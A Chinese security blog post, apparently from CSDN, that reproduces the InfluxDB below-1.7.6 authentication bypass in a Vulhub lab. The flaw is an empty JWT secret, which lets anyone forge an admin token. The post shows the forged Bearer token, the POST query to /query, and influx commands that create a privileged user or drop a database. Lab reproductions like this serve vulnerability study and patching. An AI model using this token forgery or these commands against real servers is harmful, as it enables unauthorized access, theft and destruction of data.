InfluxDB 未授权访问 漏洞复现

最新推荐文章于 2024-07-07 02:50:17 发布
最新推荐文章于 2024-07-07 02:50:17 发布
阅读量4.9k 收藏 5
点赞数 5
分类专栏: 漏洞复现 文章标签: InfluxDB InfluxDB 未授权访问 数据库 安全 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/118754782
版权

InfluxDB 未授权访问漏洞复现

一、漏洞描述

InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。

二、漏洞影响

InfluxDB < 1.7.6

三、漏洞复现

1、环境搭建

使用 Vulhub 在服务器上搭建:

cd /vulhub/influxdb/unacc
docker-compose up -d

开放在默认的8086端口,环境启动后,访问http://xxx:8086/debug/vars可查看系统服务信息:
在这里插入图片描述

2、漏洞复现

进入到/query查询功能会提示需要登录:
在这里插入图片描述
通过https://jwt.io/生成Cookie,绕过身份验证,构造所需的 Token:

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "username": "admin",
  "exp": 1676346267
}

其中,username需要为已存在的用户,exp是时间戳,代表该 Token 的过期时间,所以需要生成一个未来的时间戳,其中1676346267转换为时间是:2023-02-14 11:44:27
secret的值置空,得到编码后的 Token:
在这里插入图片描述
抓取/query页面的数据包,并将请求方式修改为 POST,添加请求头:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A

添加 POST 请求键值对:db=sample&q=show+users
在这里插入图片描述
发送数据包,得到查询结果。

命令行连接目标:

 influx -database 'databasename' -host '0.0.0.0' -port '8086'

常用命令:

show databases		# 显示数据库
show users			# 显示用户
show measurements	# 显示所有measurements

create user influx with password '*********' with all privileges;	# 创建用户

create database xxx	# 创建xxx数据库
drop database xxx	# 删除xxx数据库

use xxx		# 使用xxx数据库
select * from measurement_name limit 10

四、漏洞POC

/query页面发送 POST 请求:db=sample&q=show users,得到用户信息回显。

参考链接

https://www.jianshu.com/p/68c471bf5533
https://vulhub.org/#/environments/influxdb/unacc/

Senimo_
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
influxdb详解-从入门到精通
11-25
一、InfluxDB的安装和简介二、InfluxDB安装后web页面无法访问的解决方案三、InfluxDB在windows下的安装和配置四、InfluxDB的关键概念五、InfluxDB的基本操作六、InfluxDB的HTTP API写入操作七、InfluxDB数据保留策略...
influxdb安装访问教程(java)
05-26
influxdb新手使用推荐,包含其下载地址,Linux版本的安装及使用
CVE-2019-20933-influxdb授权访问-vulhub
c0529的博客
06-12 559
InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。
漏洞复现Influxdb,H2database,couchDB,ElasticSearch
m0_63917373的博客
11-30 1512
漏洞复现Influxdb,H2database,couchDB,ElasticSearch vulhub vulfocus
CouchDB Influxdb 漏洞及渗透
最新发布
weixin_36963480的博客
07-07 40
#知识点:1、服务攻防-数据库类型安全 2、influxdb-授权访问-jwt验证 3、H2database-授权访问-配置不当 4、CouchDB-权限绕过配合RCE-漏洞 5、ElasticSearch-文件写入&RCE-漏洞 这些数据库在特定的环境上用到,特用的程序固定的。使用面不广,但是有一定的应用价值...
influxdb授权访问漏洞
zzzzz1284的博客
03-13 616
influxdb授权访问漏洞
InfluxDB 授权访问漏洞复现
yzl_007的博客
09-19 716
InfluxDB 授权访问漏洞复现 InfluxDB 授权访问漏洞复现漏洞介绍影响版本环境搭建漏洞复现 漏洞介绍 influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 影响版本 InfluxDB < 1.7.6 环境搭建 使用vulhub的漏洞环境 cd /vulhub/influxdb/unacc docker-compo
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2666
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
(五)解决InfluxDB 授权访问
weixin_48226988的博客
12-31 6226
InfluxDB是一个由InfluxData开发的开源时序型数据库。它由Go写成,着力于高性能地查询与存储时序型数据。InfluxDB被广泛应用于存储系统的监控数据,IoT行业的实时数据等场景。 默认情况下InfluxDB没有开启认证措施,攻击者可以通过授权访问,构造相应的API请求,直接操作InfluxDB中的数据,可能导致敏感数据丢失或者泄漏。 开启InfluxDB 授权访问访问还是很简单的,操作步骤如下。 1、没有设置auth时,直接就显示了数据库内容 ~:influx > show data
InfluxDBStudio-0.2.1
03-01
InfluxDB Studio 0.2.1:高效管理InfluxDB数据库的利器》 InfluxDB是一款专为时间序列数据设计的高性能、开源数据库,广泛应用于监控、物联网、大数据分析等领域。为了方便用户对InfluxDB进行管理和操作,...
influxDBStudio
08-05
2. 用户与权限管理:用户可以创建、编辑和删除InfluxDB用户,并设定相应的权限,实现安全的数据访问控制。 3. 表格视图与图表展示:InfluxDBStudio提供数据表格视图和各种图表展示,如折线图、柱状图、饼图等,便于...
influxdb linux 安装包 2.0.8
10-23
InfluxDB是一款开源的时间序列数据库,专为处理大量的时间戳数据而设计,广泛应用于监控、IoT、性能分析等领域。本文将详细介绍如何在Linux系统上安装InfluxDB 2.0.8版本。 首先,我们需要了解InfluxDB的基本概念。...
Influxdb授权访问&CouchDB权限绕过
weixin_54882883的博客
07-21 473
当我们发送数据包,可以看见一个OK的时候啊。对应版本最好不要高于1.7.0。默认端口80868088。还要另外一个是需要抓数据包的。然后在数据中添加一个部分。数据包中需要添加两个东西。FOFA可以怎么去试试。你就可以尝试去登录一下。这时候就可以查数据了。就可能用户添加成功了。...
vulhub漏洞复现28_Influxdb
weixin_44193247的博客
02-02 730
vulhub漏洞复现练习篇
安全资讯】Debian InfluxDB数据库发现身份验证绕过漏洞,需要尽快升级
翼安研习社的博客
01-06 623
来源: TechWeb.com.cn 发布时间:2021-01-04 Debian是一个完全自由的稳定且安全的基于Linux的操作系统,其使用范围包括笔记本计算机,台式机和服务器。Debian是许多其他发行版(例如:Ubuntu、Deepin、Knoppix、PureOS、SteamOS等)的种子和基础。自1993年以来,它的稳定性和可靠性就深受用户喜爱。 1月1日,Debian InfluxDB时序型数据库发现身份验证绕过漏洞,需要尽快升级。以下是漏洞详情: 漏洞详情 来源:https://www.d
漏洞修复】node-exporter被检测/debug/vars泄漏信息漏洞
Meepoljd的博客
07-18 3192
和之前的pprof类似,都是国产的安全工具扫出来的莫名其妙的东西,这次也是报的node-exporter存在这个漏洞,又归我处理。
ansible-playbook debug输出区别与用法
热门推荐
liuhaoy的博客
06-11 1万+
ansible-playbook debug中var输出和msg输出的区别 msg:调试输出的消息 var:将某个任务执行的输出作为变量传递给debug模块 使用var的时候,引用变量无需加上大括号{{}} 使用msg的时候相当于输出一条字符串,需要加上引用变量 [root@iZ2ze1o roles]#cat checkd_docker.yml --- - hosts: youyou tasks: - name: debug-var vars: ..
数据库安全InfluxDB 授权访问-Jwt验证不当 漏洞.
网络安全领域___专研者.
11-11 1340
InfluxDB 是一个开源分布式时序,时间和指标数据库。其数据库是使用​​​​​​​Jwt 作为鉴权方式,在用户开启认证时,如果在设置参数shared-secret的情况下,Jwt 认证密钥为空字符串,这样攻击者就能伪造任意用户身份在 InfluxDB 数据库中执行SQL语句,因此会导致敏感信息泄露和执行威胁到数据库的数据命令.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值